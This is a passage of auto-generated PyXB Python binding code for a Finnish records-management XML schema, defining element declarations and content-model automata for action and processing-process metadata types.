symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'KokoavanProsessitunnuksenLahdeTeksti')), None)
st_16 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_16)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_15, False))
symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Laajennos')), None)
st_17 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_17)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
transitions.append(fac.Transition(st_6, [
]))
transitions.append(fac.Transition(st_7, [
]))
transitions.append(fac.Transition(st_8, [
]))
transitions.append(fac.Transition(st_9, [
]))
transitions.append(fac.Transition(st_10, [
]))
transitions.append(fac.Transition(st_11, [
]))
transitions.append(fac.Transition(st_12, [
]))
transitions.append(fac.Transition(st_13, [
]))
transitions.append(fac.Transition(st_14, [
]))
transitions.append(fac.Transition(st_15, [
]))
transitions.append(fac.Transition(st_16, [
]))
transitions.append(fac.Transition(st_17, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_1, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_2, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_3, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_4, False) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_5, True) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_5, False) ]))
st_7._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_6, True) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_6, False) ]))
st_8._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_7, True) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_7, False) ]))
st_9._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_8, True) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_8, False) ]))
st_10._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_9, True) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_9, False) ]))
st_11._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_10, True) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_10, False) ]))
st_12._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_11, True) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_11, False) ]))
st_13._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_12, True) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_12, False) ]))
st_14._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_13, True) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_13, False) ]))
st_15._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_14, True) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_14, False) ]))
st_16._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_15, True) ]))
st_17._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
kasittelyprosessiTiedotTyyppi._Automaton = _BuildAutomaton_10()
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ToimenpiteenKuvausTeksti'), kuvausTekstiTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ToimenpideluokkaTeksti'), toimenpideluokkaTekstiTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ToimenpideluokkaTarkenneTeksti'), toimenpideluokkaTarkenneTekstiTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'KasittelyprosessinTilaTeksti'), kasittelyprosessinTilaTekstiTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), pyxb.binding.datatypes.string, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi'), pyxb.binding.datatypes.string, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), _ImportedBinding_metarecord_binding__jhs.LoppuPvmTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, scope=toimenpidetiedotTyyppi, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Toimenpidetiedot'), toimenpidetiedotTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Asiakirjatieto'), asiakirjatietoTyyppi, scope=toimenpidetiedotTyyppi, location=None))
def _BuildAutomaton_11 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_11
del _BuildAutomaton_11
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_7)
cc_8 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_8)
cc_9 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_9)
cc_10 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_10)
cc_11 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_11)
cc_12 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_12)
cc_13 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_13)
cc_14 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_14)
cc_15 = fac.CounterCondition(min=0, max=None, metadata=None)
counters.add(cc_15)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(toimenpidetiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ToimenpideluokkaTeksti')), None)
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(toimenpidetiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ToimenpideluokkaTarkenneTeksti')), None)
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(toimenpidetiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ToimenpiteenKuvausTeksti')), None)
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(toimenpidetiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'KasittelyprosessinTilaTeksti')), None)
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(toimenpidetiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi')), None)
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(toimenpidetiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi')), None)
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_6, False))
symbol = pyxb.binding.content.ElementUse(toimenpidetiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi')), None)
st_6 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_7, False))
symbol = pyxb.binding.content.ElementUse(toimenpidetiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm')), None)
st_7 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_8, False))
symbol = pyxb.binding.content.ElementUse(toimenpidetiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi')), None)
st_8 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_9, False))
symbol = pyxb.binding.content.ElementUse(toimenpidetiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm')), None)
st_9 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_10, False))
symbol = pyxb.binding.content.ElementUse(toimenpidetiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi')), None)
st_10 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_11, False))
symbol = pyxb.binding.content.ElementUse(toimenpidetiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm')), None)
st_11 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_11)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_12, False))
symbol = pyxb.binding.content.ElementUse(toimenpidetiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm')), None)
st_12 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_12)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_13, False))
symbol = pyxb.binding.content.ElementUse(toimenpidetiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm')), None)
st_13 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_13)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_14, False))
symbol = pyxb.binding.content.ElementUse(toimenpidetiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Asiakirjatieto')), None)
st_14 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_14)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_14, False))
symbol = pyxb.binding.content.ElementUse(toimenpidetiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Toimenpidetiedot')), None)
st_15 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_15)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_15, False))
symbol = pyxb.binding.content.ElementUse(toimenpidetiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Laajennos')), None)
st_16 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_16)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_3, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_14, [
